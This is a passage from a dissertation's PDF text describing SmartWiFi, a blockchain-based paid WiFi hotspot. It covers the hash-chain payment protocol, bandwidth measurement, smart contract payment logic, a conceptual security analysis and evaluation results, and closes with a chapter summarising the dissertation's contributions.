router performs the following steps: (1) SmartWiFi router deploys several reusable smart contracts,
the number of which equals the maximum number of concurrently-served clients; (2) the router
establishes a two-way communication channel with every user; (3) the router activates a default
                                                          177


firewall policy that allows every client to have a restricted access to required services, such as the
blockchain API. We define the service period as the period the client is connected to the Internet
via a SmartWiFi router, and the service unit as the minimum service period that the client will be
charged for.
7.3.2: Hansa Handshake Session
In Hansa handshake session, the router and the client establish a relationship regulated and pro-
tected by the smart contract. Hansa protocol begins when the client connects to the hotspot and
establishes a TCP connection with the SmartWiFi router. The router replies with a greeting mes-
sage, and the client generates a hash chain Υ using a random secret seed Υ0 . The length of the hash
chain, denoted as |Υ|, is calculated as |Υ| =     T
                                                  η
                                                    , where T is the length of the service period, and
η is the length of the service unit. For instance, in our prototype, the length of the service period
is 3,600 seconds, and the length of the service unit is 60 seconds, i.e., one Hansa session serves a
connection up to 1 hour in length with per-minute acknowledgements.
    The client keeps the seed of the hash chain in secret and sends the head of the hash chain Υhead
and the public address Apub to the router. The router then prepares the smart contract by storing
the public key of the client’s public address and the head of the hash chain in the smart contract.
After that, the router replies to the client with the address of the smart contract. Before executing
prepayment, the client verifies the bytecode of the smart contract and the price per service unit
ξ, which is hard-coded in the smart contract. Then, the client prepays the smart contract with the
amount of cryptocurrency Ξ that corresponds to the cost of the entire service period, i.e., Ξ = ξ × Tη .
Once the prepayment is processed by the blockchain, the client and router enter the Hansa service
session. If the price is unacceptable, the client terminates the connection.
7.3.3: Hansa Service Session
The Hansa service session begins after the router verifies that the client has funded the smart con-
tract. Then follows the grace period, which seamlessly switches into an unrestricted Internet access.
Meanwhile, the router sends the client a short message signifying the beginning of a service session,
                                                   178


                                                                                                      Missed ACK
   Client picks random Υ0                                                                              deadline
                                                            ...                                               ...
                               Client sends Υn-1 to router      Client sends Υi to router                         Client disconnected      Router requests
   Client generates Υ, |Υ| = n
                               Router verifies that Υn-1∈ Υ     Router verifies that Υi∈ Υ                        Router passively waiting payment using Υi
   Client sends Υn to router                                                               DISCONNECTION
                                                                                                                                                   time
  Υhead=Υn=H(Υn-1)                 Υn-1=H(Υn-2)                     Υi=H(Υi-1)              Υi-1=H(Υi-2)             Υ1=H(Υ0)                Υ0
                                                            ...                                               ...
Figure 7.2: Hansa timeline with respect to the hash chain Υ. In this scenario, the client disconnects
after releasing acknowledgement Υi , and the acknowledgement Υi−2 was not released. When the
service session timer expires, the router uses the last available acknowledgement Υi to request
payment from the smart contract.
and both the client and router start service session timers.
Satisfaction Acknowledgement: Traditional paid WiFi hotspots charge users ahead of the service,
and if the QoS is unacceptable, requesting refund is often challenging. We use cryptographic satis-
faction acknowledgements to allow the client to control its service session and payment. The first
service unit of a service session is regarded as a free trial, during which the client confirms that the
Internet connection is active and starts measuring speed (described in Section 7.3.4). Before the
end of each service unit, the client confirms a satisfactory QoS by sending to the router a satisfac-
tion acknowledgement (the next hash in the hash chain), as shown in Fig. 7.2. The router verifies
that the acknowledgement is the valid hash on the hash chain, replies with an acknowledgement
response, and extends the connection for another service unit.
      Hansa allows the client to pause the connection, which can happen automatically as a result
of a speed probe, or can be triggered manually by the user. If the router does not receive the
next acknowledgement on time, it deactivates the Internet access for the client. During the service
period, the client can resume acknowledging the service, which will reactivate the Internet access,
with a maximum reactivation delay η. The service session concludes when either the timer reaches
the value T , or when the client-router connection breaks.
7.3.4: DupSet Speed Measurement
We present DupSet, a bandwidth estimation solution that allows SmartWiFi clients to quantify
hotspots’ QoS. SmartWiFi is designed to operate in a flexible range of speeds and with different
                                                                                179


            Table 7.1: Summary of smart contract features required for executing Hansa.
                     Feature                     Type           Access Control        Security Measure
            Υhead (hash chain head)            variable            rw-r--r--                  timer
             Apub (public address)             variable            rw-r--r--                  timer
                     ξ (price)                 constant            rw-r--r--               read only
               T (session length)              constant            r--r--r--               read only
                τ (refund delay)               constant            r--r--r--               read only
             η (session unit length)           constant            r--r--r--               read only
                  balance check                function            r-xr-xr-x               read only
                 Υhead -accessor               function            r-xr-xr-x               read only
                  Υhead -mutator               function            r-xr--r--                  timer
                  Apub -accessor               function            r-xr-xr-x               read only
                  Apub -mutator                function            r-xr--r--                  timer
                  prepay (fund)               p-function           r-xr-xr-x                  none
                     checkout                  function            r-xr--r--               Υ-check
                      refund                   function            r--r-xr--               delay (τ )
number of mobile or stationary users, so the bandwidth estimation should be frequent and with low
overhead. Traditional speed evaluation methods include four metrics: capacity, available band-
width, TCP throughput, and bulk transfer capacity (BTC) [234]. Although these techniques can
provide very accurate results, they are not suitable for SmartWiFi since they require lengthy probes
and transfer of large amounts of data.
     The core of DupSet is a metric called user-perceived speed, represented by the transmission
component of the throughput when loading an average web page. Measuring the transmission com-
ponent, instead of the entire end-to-end communication, allows to achieve transparency with respect
to different bandwidth uses, such as video streaming services or VPN traffic. DupSet draws probes
from pre-selected servers. Unlike many traditional bandwidth services, such as M-Lab [201] and
Ookla [225], the DupSet servers do not require to deliver high computational and throughput per-
formance. Each probe calculates a statistical summary55 of readings from all the reachable servers
from the list. Then, the current DupSet reading is calculated using a simple moving average56 .
     Each DupSet server is an HTTP server with two payload files with random information available
  55
     We experimentally found that the third quartile statistic achieves a better measurement accuracy compared to mean,
median, and maximum.
  56
     We empirically determine that simple moving average over 6 periods (SMA-6) delivers stable and reliable results.
                                                            180


for download. The size of the first file (P1 bytes) is much greater than the size of the second
file (P2 bytes). The client loads both the files and calculates the difference between delays of
downloading the first and the second file, which extracts the transmission delay from the total end-
to-end delay. Then, the user-perceived speed reading (in bytes/second) for ith server is determined
               EP F (P1 −P2 )
as Speedi =        ∆Di
                              , where EP F is the Effective Payload Function defined as follows:
                                                
                                                
                                                
                                                
                                                 0,   if x ≤ 0;
                                                
                                                
                                                
                                    EP F (x) =    0,   if request failure;
                                                
                                                
                                                
                                                
                                                
                                                
                                                x,    otherwise.
∆Di is the time in seconds needed to load the file from the server i. The EP F function filters
out unreliable results and ignores results from inaccessible DupSet servers, so when one or several
DupSet servers are unavailable or provide unreliable readings, the accuracy of the DupSet result is
not affected.
7.3.5: SmartWiFi Smart Contract
The SmartWiFi smart contract provides an overarching trust layer between the router and the client
to exchange data and payments. The SmartWiFi smart contract has the following components: a)
state variables; b) state changing functions; c) cryptocurrency balance; and d) payable function
(p-function) for incoming payments. The functions that do not submit transactions (pure and view
functions) are called anonymously, whereas the calls to state changing functions are signed by a
specific user (using the account’s private key).
    The minimal set of the SmartWiFi smart contract features is summarized in Table 7.1, which
includes constants, variables, functions, and one payable function. The access control to each
feature is represented in the Unix-style symbolic access mode format, where the first triple refers
to the router’s privilege, the second triple is for user’s privilege, and the third one is for others. The
security column describes protective measures employed for each feature.
    The price ξ, session length T , refund delay τ , and service unit length η are set as constants to
                                                    181


  Algorithm 2: Smart contract payment routine
    INPUT: Υhead , Υi , ξ, t, T , η, Apub
    OUTPUT: none
      1: if Υi ∈ Υ and caller = Router and T imestamp ≥ t + T then
      2:    RouterBalance ← i × ξ
      3:    Ref undAmount ← ( Tη − i) × ξ
      4:    T ransf erF unds(Apub , Ref undAmount)
      5: end if
      6: return
reduce execution delays and fees. The smart contract has two variables for hash chain head Υhead
and client public address Apub ; they can only be set by the router using their mutators. The accessor
and balance check functions are called without fees since they do not modify the blockchain. Both
the mutators use timers to prevent the modification of the values they set. The values are protected
using a timer for at least the duration of a Hansa session, including handshake, service session,
and checkout. The timer plays two important roles: first, it prevents a malicious modification of
Υhead and Apub by the router; second, it facilitates the reuse of the smart contract, thereby reduc-
ing blockchain fees and delays. The prepay function funds the smart contract. The checkout and
refund functions include additional security checks as depicted in Algorithms 2 and 3, which will
be described next.
7.3.6: Payment and Refund
The fair payment and refund procedures are automatically enforced by the SmartWiFi smart con-
tract. The smart contract holds the amount of cryptocurrency Ξ, sufficient for funding one Hansa
session. The router is prohibited from claiming its payment until the blockchain timestamp reaches
the value t + T , where t is the saved timestamp at the beginning of the service session. Algorithm 2
shows how the payment is executed. The inputs include: the hash chain head Υhead , last retrieved
acknowledgement Υi , price ξ (stored as a constant in smart contract), timestamp t (saved during
handshake), service session length T (constant), session unit length η, and the user’s public ad-
dress Apub . The router obtains the payment based on the depth of Υi , and the remaining funds are
transferred back to the client as a refund.
                                                 182


  Algorithm 3: Smart contract refund routine
    INPUT: Υhead , ξ, t, T , η, τ , Apub
    OUTPUT: none
      1: if caller.address = Apub and T imestamp ≥ t + T + τ then
      2:    Ref undAmount ← Tη × ξ
      3:    T ransf erF unds(Apub , Ref undAmount)
      4: end if
      5: return
    The execution of lines 2-4 in Algorithm 2 can only be triggered by the router. In case when the
router does not request any payment, the client may never receive any refund, for which case we
design an additional refund routine, described in Algorithm 3. The execution of the actual refund
(lines 2–3) is permitted only by the client after the pre-determined refund delay τ , which prevents
refund before payment described in Section 7.4.
7.4: Security Analysis
The security threats of SmartWiFi come either from malicious clients or from malicious hotspot-
s/routers. In this section, we analyze the security of SmartWiFi.
Non-Service by Malicious Hotspot: The goal of the client is to have a satisfying Internet connec-
tion for the money paid. If the high-quality service is not provided, full or partial refund should
be guaranteed. A malicious router might refuse a service, i.e., to receive a payment without pro-
viding a quality connection. To counteract such a behavior, the SmartWiFi client uses DupSet to
assess the quality of Internet connection before sending each subsequent acknowledgement, while
the SmartWiFi smart contract guarantees a full or partial refund.
Refund before Payment: The router expects to be fairly paid after the connection period is over.
The goal of the client, who prepaid the smart contract with one whole period worth of money, is
to receive a refund for all service units that do not result in satisfaction acknowledgement. Refund
before payment indicates the case when a malicious client claims no service received and asks for
a full refund. In SmartWiFi, this threat is prevented by the refund delay τ for the router to claim
payment, during which the refund is impossible.
                                                  183


Handshake Flooding: The handshake of SmartWiFi is prone to denial-of-service attacks. The goal
of the adversary in the handshake flooding attack is to render the router unavailable or degrade its
performance. This can be achieved by initiating multiple incomplete handshakes, in which the
attacker, pretending to be a valid client, forces the router to submit values to the smart contract, for
which the blockchain charges fees. In SmartWiFi, this attack is prevented by checking the balance
of the client before preparing the smart contract for that client. SmartWiFi router also curbs the
number of clients to serve: once the number of requests exceeds the maximum, SmartWiFi starts
dropping requests.
Free-Rider Attack (Non-Payment): The existence of the free trial in Smart-WiFi allows any
user who funds the contract to gain one service unit of Internet connectivity without providing
an acknowledgement. A dedicated attacker may use multiple client devices to interchangeably
connect to the router, use the free trial period (1 minute in this work), disconnect without providing
any acknowledgements, tunnel the traffic to the same outlet, and then request a full refund. We
define such connection misuse as traffic hopping, which is a special case of the free-rider attack.
In SmartWiFi, we prevent such threats by relying on the accruing blockchain fees. As the creation
of new malicious nodes (i.e., Sybil nodes) will require the attacker to transfer funds into multiple
accounts and pay fees for each funding transaction, such fees, after being summed up from multiple
accounts, will nullify the benefits of the free riding. After the free trial, the router expects to receive
regular satisfaction acknowledgements. Each acknowledgement from a client is expected to arrive
before a strict deadline, otherwise, the Internet connection will be terminated by the router.
7.5: Implementation
We implement a fully-functional SmartWiFi prototype on a Netgear router and Raspberry Pi clients
for testing the general functionality and performance of the system. In addition, we implement an
Android SmartWiFi client app, as shown in Figure 7.3a, for testing the performance of SmartWiFi
on mobile devices. The client app can be easily ported to iOS. We use Java 11 and Web3j for
implementing the software of the router, the desktop/IoT client, and the Android client. We use
                                                    184


                (a)                                                 (b)
Figure 7.3: SmartWiFi prototype: (a) The connection page of the SmartWiFi Android app; (b)
SmartWiFi configuration with a wired Internet connection, Raspberry Pi as a SmartWiFi router,
retail WiFi router with factory software, and Android smartphone as a SmartWiFi client.
Infura API [11] to interact with Ethereum blockchain.
    Figure 7.3b shows one possible configuration of SmartWiFi, in which Smart-WiFi router soft-
ware is installed on Raspberry Pi with two Ethernet interfaces: one for Internet connection, another
for delivering the Internet to the WiFi router. The retail WiFi router runs its original software; the
configuration of this router includes TCP port 5566 forwarding in order to allow connected devices
to access the SmartWiFi router. The client in this configuration is an ordinary Android smartphone
without rooting. This configuration ensures SmartWiFi’s compatibility with legacy systems, i.e.,
we can easily deploy SmartWiFi by plugging in a device running SmartWiFi router software.
    We implement a prototype SmartWiFi Ethereum smart contract using Solidity programming
language. In our prototype and evaluation, we use both Mainnet and Ropsten testnet for executing
the smart contracts. Furthermore, we build an IoT testbed with five Raspberry Pi clients simulta-
neously connected to a single-antenna all-in-one SmartWiFi router (AMD A4 Micro-6400T, 4GB
RAM, Xubuntu 18.04). This setup demonstrates that SmartWiFi can be easily adapted to support
a diverse variety of IoT configurations.
                                                 185


7.6: Evaluation
We thoroughly evaluate the performance of the SmartWiFi prototype by scrutinizing the following
system parameters under different circumstances: blockchain-related delays, Ethereum gas fees,
smart contract storage, the accuracy of DupSet speed probes, the scalability of the system, and the
communication overhead. In Ethereum, all blockchain-modifying transactions require the caller to
pay fees measured in the unit named gas, which is convertible into Ether using a dynamic variable
called gas price. In our evaluation, the service session lasts for one hour (T = 3, 600 seconds), and
the service unit is one minute (η = 60 seconds).
7.6.1: Delays
In this section, we evaluate the blockchain-related delays of SmartWiFi sessions in both Mainnet
and Ropsten Ethereum networks. We add the Ropsten testnet for comparison to demonstrate the
performance stability of SmartWiFi under Ethereum networks with different amounts of mining
hash power. Thus, we show that if the parameters of the blockchain change in the future, it will
not significantly affect the performance of SmartWiFi. For each type of blockchain-related delays,
ten measurements have been taken. The average delays (with standard deviations) for Ropsten and
Mainnet are presented in Table 7.2, from which we observe similar delays in both the networks.
    The connection initiation phase, in which no blockchain interaction occurs, takes a few seconds
on average; after this phase the user can start accessing the Internet. The handshake phase, whose
average delay is below one minute for both Ropsten and Mainnet, initiates the payment arrangement.
The code check phase, which requires only a non-modifying blockchain operation, also takes a few
seconds in delay. The smart contract funding phase is essentially a cryptocurrency transaction,
which requires more time than a read-only blockchain request. Similarly, payment and refund
routines, although demanding additional calculations and checks, demonstrate delays just a little
longer than a simple Ether transfer. In summary, to connect to a SmartWiFi router and start Internet
access, the client only experiences a few seconds of connection initiation delay, which is completely
acceptable.
                                                  186


Table 7.2: Comparison of blockchain-related average delays (in seconds) with relatively high gas
price (100 GWei for Ropsten and 5 GWei for Mainnet).
                                           Ropsten Testnet        Ethereum Mainnet
                    Delay Type
                                             davg        σ          davg           σ
                Connection initiation       3.965      0.177       4.161         0.202
                     Handshake             39.093     18.504      53.161        16.432
                Bytecode verification       4.268      0.376       4.291         0.360
                       Funding             23.629     17.711      25.449        14.519
                      Payment              30.729     23.208      31.512        17.304
                       Refund              33.194     23.640      37.521        23.006
    The delay of blockchain execution in the Ethereum network can be further reduced by increas-
ing the gas price offered for a transaction [78]. However, such a performance optimization is not
guaranteed [256]. First, the Ethereum blockchain protocol does not enforce the prioritization of
incoming transactions, leaving this decision to the discretion of miners. Second, since Ethereum is
a decentralized network, the increase of transaction execution speed adopts a best-effort approach.
Here, we conduct an empirical testing to evaluate the delays with respect to different gas prices,
the result of which, presented in Figure 7.4, demonstrates a slight but consistent reduction of total
SmartWiFi session delays as the gas price increases, which shows the possibility of reducing delays
by offering a higher gas price. However, given the increasing cost, the delay reduction may not be
worthwhile.
7.6.2: Fees
In this section, we measure the gas fees per transaction when a public function of the SmartWiFi
smart contract is called. In order to exclude the possibility of variable fees, we take every measure-
ment twice, and confirm that the cost remains the same for both measurements. The summary of
gas fees is presented in Table 7.3. The address accessor, hash chain head accessor, balance check,
and bytecode download are read-only blockchain operations, which do not incur any fees. How-
ever, the mutators and payable functions require the caller to pay fees. The fees in Table 7.3 are
calculated for one 60-minute service session, with 1-minute service units.
                                                  187


                                               220
                                               200
                     Session delay (seconds)
                                               180
                                               160
                                               140
                                               120
                                               100
                                                80
                                                     1.000   125.875       250.750    375.625   500.500
                                                                       Gas Price (GWei)
Figure 7.4: Full session delays with different gas prices in Ropsten network. The graph has a
logarithmic Gas price axis, and it shows that while it is empirically true that offering more gas
increases the chance of faster transaction, the speed improvement is insignificant.
   Ethereum allows the issuer of a transaction to offer an arbitrary gas price to prioritize the transac-
tion. Similar to the delay-measuring experiment in Figure 7.4, we record fees over 10 measurements
on Ropsten network for a more realistic 10 gas prices equally spread across the interval between
0.5 and 5.0 GWei. The cumulative fee (for both router and client) is less than $0.4, even with the
highest gas price and ETH market price. Since the highest gas price is used rarely in production
systems, the fee overhead is expected to be significantly lower then the maximum.
   It is important to note that the cryptocurrency market price variations have little effect on
SmartWiFi fee overhead. Ethereum is a dynamic self-regulating system, so when the market price
of Ether goes up, the users can afford less, and they offer smaller fees for transactions, which
results in lower average gas price, and vice versa [78]. The curve of resulting fee in USD is thus
smoothed and flattened. Therefore, regardless of any cryptocurrency price fluctuations, SmartWiFi
blockchain fees paid in USD will remain approximately the same.
7.6.3: Smart Contract Storage
Table 7.4 shows a comparison between data stored in the SmartWiFi smart contract with and without
hash chain compression, from which we can see that the hash chain in Hansa stores about 17 times
                                                                           188


Table 7.3: Gas fees for different functions of the SmartWiFi smart contract. Since SmartWiFi
uses an off-chain execution protocol with infrequent smart contract transactions, the resulting fee
overhead drops significantly.
                                           Transaction fee with recommended gas price [3]
                   Function
                                                   Gas                   Approx. USD
                 Apub -accessor                     0                            0
                 Apub -mutator                   28,366                        0.11
                Υhead -accessor                     0                            0
                 Υhead -mutator                  33,684                        0.13
                 Balance check                      0                            0
                   Payment                       50,076                        0.20
                    Refund                       42,266                        0.17
                 Fund contract                   21,040                        0.08
         Download contract bytecode                 0                            0
less data in the smart contract, effectively reducing per-session delays. Moreover, it also reduces
per-session fees from $8 to about 40¢ in USD equivalent, which corroborates the feasibility of
SmartWiFi in terms of low cost.
            Table 7.4: Data stored in the smart contract per session (T = 3, 600, η = 60).
                                                       Stored data per session
                        Data Unit
                                             With hash chain      Without hash chain
                 Acknowledgement data             32 bytes            1,920 bytes
                      Client identity             20 bytes              20 bytes
                      Auxiliary data              64 bytes              64 bytes
                          Total                  116 bytes            2,004 bytes
7.6.4: DupSet Measurement and Overhead
In this section, we evaluate the feasibility of DupSet by comparing our estimations with the average
readings obtained from nine popular Internet speed measurement services, specifically: Bandwidth
Place, DSLReports, Fast.com, Google Fiber, Internet Health Test, M-Lab, Ookla, Speed-Of.Me,
and Xfinity. We test ten different SmartWiFi router Internet connections belonging to different
speed tiers, and evaluate average speeds of each of these connections by taking six speed test probes
at each of the nine services listed above. The six speed test probes consist of three probes per
                                                   189


service before running the DupSet simulation, and three probes per service right after the DupSet
simulation.
    In our prototype setup, we deploy ten DupSet servers in different geographic locations. In
order to achieve further diversity in measurements, we use servers provided by two different cloud
services, DigitalOcean [10] and Vultr [101]. For each Internet connection, we run 60 probes of
DupSet for measuring the transmission speed component from each of the servers based on the
payload of 10 kilobytes. The fastest reading from the ten servers represents the speed result of a
probe.
    The experiment confirms that the low-overhead DupSet estimations correlate with the high-
overhead traditional Internet speed readings. Figure 7.5 shows that DupSet speed measurement
results accurately reflect the Internet connection speed tier, which quantifies the QoS of user service.
The spiked increase in the gap between the two readings at high speeds demonstrates the core
difference between traditional bandwidth measurements and user-perceived speed estimation: a
drastic increase in available bandwidth after a certain threshold does not trigger a proportional
boost in loading web pages. In a high-speed Internet, the performance bottleneck moves from the
client to the server.
    The overall maximum communication overhead of DupSet probes depends on the number of
DupSet servers and the size of payload on any of these servers. In our prototype, we empirically
select a 10-kilobyte DupSet payload and 10 DupSet servers, resulting in 100-kilobyte maximum
overhead per probe, or approximately 6 Mb of overhead per one-hour session. Through this experi-
ment, we demonstrate that DupSet probes reflect accurate user-perceived speed with low overhead.
    A SmartWiFi client uses DupSet to control minimum expected speed. Since different users
may have different minimum speed requirements at different times (e.g, watching stream video
needs higher speed than reading e-mail), it is required from the users to explicitly specify their
expectations in the client settings. In the SmartWiFi Android app, for example, we let the user
choose between 5 discrete options.
                                                  190


                        Measured downlink speed (Mbps)
                                                         700
                                                                         DupSet
                                                         600
                                                                         Speed measurement websites
                                                         500
                                                         400
                                                         300
                                                         200
                                                         100
                                                             0
                                                                 1         2                    3         1                                  z        2
                                                             N           N          em       N          N          iF i        em        H           N              et
                                                         VP           VP         od        VP        VP           W          od          G       VP             rn
                                                                                M                              m                        i5                     he
                                                         P           P                   P          P        oa            M        iF           P        Et
                                                   TC            TC          E        TC         D                      le         -W        D
                                                                           LT                   U         ur          ab                     U       ab
                                                                                                                                                          it
                                                                                                        Ed         C           AT
                                                                                                                               N                     ig
                                                                                                                             it-                 G
                                                                                                                          ab
                                                                                                                        ig
                                                                                                                      G
                                                                                    Internet connection profile
Figure 7.5: Correlation between traditional Internet speed measurement (average result from nine
websites) and DupSet probes over 10 different Internet connection profiles.
7.6.5: Scalability
SmartWiFi is designed to scale to multiple clients connecting to a single router. We evaluate the
performance of the system under the load of different numbers of users. For each client, we perform
a background web surfing simulation that picks and loads a random website from the Alexa Top 10K
list [250] every 10 seconds. Figure 7.6 shows the number of clients one router could serve without
disconnection. As we can see, this capacity depends on the bandwidth of the Internet connection of
the router and the maximum expected Internet speed set by the client. The experiment shows that
when the router has a high-bandwidth Internet connection, and clients do not request high speed,
SmartWiFi is capable of serving hundreds of clients simultaneously57 .
       Figure 7.7 shows average DupSet readings for different Internet connections with different num-
ber of simultaneously served clients under a background web surfing simulation. The graph shows
the number of clients one SmartWiFi router can serve based on its Internet connection bandwidth
and average speed expectations. For example, it will be overly ambitious for a SmartWiFi router
with 100 Mbps connection to serve 40 users whose average speed expectation is 2 Mbps. However,
  57
    The growing number of users incurs higher rate of physical layer packet collisions. One way to mitigate this is to
use MIMO WiFi access point hardware.
                                                                                                          191


                                                          300
                    Max. number of simultaneous clients
                                                                                                Ethernet, 100 Mbps
                                                          250                                   LTE, 52 Mbps
                                                                                                VPN, 28 Mbps
                                                          200                                   Tor, 6 Mbps
                                                          150
                                                          100
                                                           50
                                                            0
                                                                       25
                                                                      12      1   2   4     8   16   32   64    8    6    2    24
                                                                06   0.  5
                                                                        25
                                                                       0.                                      12   25   51   10
                                                                0.   0.   5
                                                   User-perceived speed limit based on DupSet (Mbps)
Figure 7.6: Maximum number of clients simultaneously served by the router for 15 min. under
different connectivities, with random web surfing simulation in the background.
if the expectation is reduced to 1 Mbps, serving 40 users simultaneously will likely be a realistic
projection.
7.6.6: SmartWiFi Communication Overhead
The communication overhead includes the client-router TCP traffic and the Infura blockchain API
communication. We measure overhead by capturing network traffic and calculating a cumulative
one-hour session TCP payload using Wireshark. Each session’s average result is based on 10 mea-
surements. The results in Table 7.5 demonstrate that the overhead of off-chain communication is
low compared to the results for blockchain-related calls.
                                                                                      192


                                                 8
                                                                         Gigabit Ethernet
                   Average DupSet speed (Mbps)
                                                 7
                                                                         Cable Modem, 100 Mbps
                                                 6                       LTE Modem, ~50 Mbps
                                                 5
                                                 4
                                                 3
                                                 2
                                                 1
                                                 0
                                                      10
                                                      20
                                                      30
                                                      40
                                                      50
                                                      60
                                                      70
                                                      80
                                                      90
                                                     10
                                                     11 0
                                                        0
                                                     12
                                                     13
                                                     14
                                                     15
                                                     16
                                                     17
                                                     18
                                                     19
                                                     20
                                                     21
                                                     22 0
                                                        0
                                                        0
                                                        0
                                                        0
                                                        0
                                                        0
                                                        0
                                                        0
                                                        0
                                                     23
                                                     24
                                                     25 0
                                                        0
                                                        0
                                                        0
                                                     Number of simultaneously connected clients
Figure 7.7: Average DupSet readings for different types of Internet connection profiles with differ-
ent number of clients simultaneously served by a SmartWiFi router.
Table 7.5: Session communication overhead for different SmartWiFi calls over 10 measurements.
The local calls represent off-chain communication between the hotspot and the client, including
handshake Eh , connection initiation Ec , connection status check Es , and acknowledgement Ea .
Blockchain (B/C) calls use Infura API [11].
                     Procedure Call                                  Avg TCP Payload (bytes)     σ
                        Local: Eh                                             580                20
                        Local: Ec                                             412                0
                        Local: Es                                             274                9
                        Local: Ea                                             334                8
                 B/C: download bytecode                                     69,797             32,633
                   B/C: Apub -accessor                                      51,597             38,224
                    B/C: Apub -mutator                                      51,279             34,389
                   B/C: Υhead -accessor                                     50,472             33,205
                   B/C: Υhead -mutator                                      60,606             36,489
                   B/C: balance check                                       64,487             46,150
                      B/C: payment                                          45,326             28,016
                       B/C: refund                                          59,500             41,856
                    B/C: fund contract                                      56,834             39,542
                                                                       193


7.7: Chapter Summary
In this work, we proposed SmartWiFi, a smart contract-enabled WiFi hotspot system, which pro-
vides universal accessibility, cross-domain authentication, association of QoS and payment, and
security enhancement. SmartWiFi utilizes a novel cryptographic mechanism, Hansa, to establish
connection. Hansa provides low-cost off-chain execution by restricting otherwise unacceptable
smart contract fees, and significantly reduces delays associated with smart contract interaction. To
validate the feasibility of SmartWiFi system, we designed and implemented a SmartWiFi prototype
using an Ethereum smart contract. The experimental results show that SmartWiFi exhibits low op-
erational delays, minimum communication overhead, and small blockchain fees. We demonstrated
that SmartWiFi is a scalable, secure, and efficient WiFi hotspot solution, which can be easily de-
ployed in a variety of systems with minimal intervention. The limited adoption of cryptocurrencies
and the volatility of their market prices can be further addressed through the use of stablecoin to-
kens, which we leave for future work.
                                                194


CHAPTER 8: CONCLUSION
Decentralized distributed systems, such as blockchain and DAG networks, are recent candidates
for integration into the Smart World. These systems can significantly increase digital equity, free-
dom, and privacy, but their integration is hindered by several fundamental technical challenges that
this dissertation aims to address. Our exhaustive research and literature review reveals that all the
challenges on the way of integration of decentralized distributed systems in the Smart World can
be subdivided into three major categories: security, scalability, and usability. So, the core method-
ology of our present and future research is to meticulously address the three groups of challenges,
thereby fostering the adoption of blockchain and other decentralized distributed systems by the
modern world.
8.1: Summary of Contributions
In this dissertation proposal, we addressed three major challenges on the way of integration of the
blockchain technology into the Smart World ecosystem: security, scalability and usability. Specif-
ically, we unraveled new blockchcain attacks, classified existing threat mitigation solutions, pro-
posed a new concept of defense, and discovered new trust-free applications of the blockchain tech-
nology. Specifically, this dissertation makes the following contributions.
Social Engineering Attacks in Smart Contracts: We explore the possibility and existence of
new social engineering attacks beyond smart contract honeypots. We present two novel classes of
Ethereum social engineering attacks — Address Manipulation and Homograph — and develop six
zero-day social engineering attacks. To show how the attacks can be used in popular programming
patterns, we conduct a case study of five popular smart contracts with combined market capitaliza-
tion exceeding $29 billion, and integrate our attack patterns in their source codes without altering
their existing functionality. Moreover, we show that these attacks remain dormant during the test
phase but activate their malicious logic only at the final production deployment. We further an-
                                                 195


alyze 85,656 open-source smart contracts, and discover that 1,027 of them can be used for the
proposed social engineering attacks. We conduct a professional opinion survey with experts from
seven smart contract auditing firms, corroborating that the exposed social engineering attacks bring
a major threat to the smart contract systems.
Attacking Hardware Wallets: We introduce EthClipper, an attack that targets owners of hardware
wallets on the Ethereum platform. EthClipper malware queries a distributed database of pre-mined
accounts in order to select the address with maximum visual similarity to the original one. We de-
sign and implement a EthClipper malware, which we test on Trezor, Ledger, and KeepKey wallets.
To deliver computation and storage for the attack, we implement a distributed service, Clipper-
Cloud, and test it on four deployment environments. Our evaluation shows that with off-the-shelf
PCs and NAS storage, an attacker would be able to mine a database capable of matching 25% of the
digits in an address to achieve a 50% chance of finding a fitting fake address. For responsible dis-
closure, we have contacted the manufactures of the hardware wallets used in the attack evaluation,
and they all confirmed the danger of EthClipper.
Taxonomy and Classification of Threat Mitigation Solutions in Smart Contracts: We develop
a comprehensive classification taxonomy of smart contract threat mitigation solutions within five
orthogonal dimensions: defense modality, core method, targeted contracts, input-output data map-
ping, and threat model. We classify 133 existing threat mitigation solutions using our taxonomy
and confirm that the proposed five dimensions allow us to concisely and accurately describe any
smart contract threat mitigation solution. In addition to learning what the threat mitigation solu-
tions do, we also show how these solutions work by synthesizing their actual designs into a set
of uniform workflows corresponding to the eight existing defense core methods. We further cre-
ate an integrated coverage map for the known smart contract vulnerabilities by the existing threat
mitigation solutions. Finally, we perform the evidence-based evolutionary analysis, in which we
identify trends and future perspectives of threat mitigation in smart contracts and pinpoint major
weaknesses of the existing methodologies. For the convenience of smart contract security devel-
opers, auditors, users, and researchers, we deploy a regularly updated comprehensive open-source
                                                196


online registry of threat mitigation solutions.
Context-Aware User-Centered Transaction Testing: We propose a new smart contract security
testing approach called transaction encapsulation. The core idea lies in the local execution of trans-
actions on a fully-synchronized yet isolated Ethereum node, which creates a preview of outcomes
of transaction sequences on the current state of blockchain. To overcome the well-known time-of-
check/time-of-use (TOCTOU) problem, i.e., the assurance that the final transactions will exhibit the
same execution paths as the encapsulated test transactions, we determine the exact conditions for
guaranteed execution path replicability of the tested transactions. To demonstrate the transaction
encapsulation, we implement a transaction testing tool, TxT, which reveals the actual outcomes
(either benign or malicious) of Ethereum transactions. To ensure the correctness of testing, TxT
deterministically verifies whether a given sequence of transactions ensues an identical execution
path on the current state of blockchain. We analyze over 1.3 billion Ethereum transactions and de-
termine that 96.5% of them can be verified by TxT. We further show that TxT successfully reveals
the suspicious behaviors associated with 31 out of 37 vulnerabilities (83.8% coverage) in the smart
contract weakness classification (SWC) registry. In comparison, the vulnerability coverage of all
the existing defense approaches combined only reaches 40.5%.
Smart Contract on the Cloud: We determine that the major obstacle to public blockchain scala-
bility is their underlying unstructured P2P networks. We further show that a centralized network
can support the deployment of decentralized smart contracts. We propose a novel approach for
achieving scalable decentralization: instead of trying to make blockchain scalable, we deliver de-
centralization to already scalable cloud by using an Ethereum smart contract. We introduce Blocku-
mulus, a framework that can deploy decentralized cloud smart contract environments using a novel
technique called overlay consensus. Through experiments, we demonstrate that Blockumulus is
scalable in all three dimensions: computation, data storage, and transaction throughput. Besides
eliminating the current code execution and storage restrictions, Blockumulus delivers a transaction
latency between 2 and 5 seconds under normal load. Moreover, the stress test of our prototype
reveals the ability to execute 20,000 simultaneous transactions under 26 seconds, which is on par
                                                 197


with the average throughput of worldwide credit card transactions.
Blockchain-Assisted Wireless Cross-Domain Authentication: We propose SmartWiFi, a uni-
versal, secure, and decentralized WiFi hotspot that can be deployed in any public or private envi-
ronment. SmartWiFi provides cross-domain authentication, fully automated accounting and pay-
ments, and security assurance for both hotspots and clients. SmartWiFi utilizes a novel off-chain
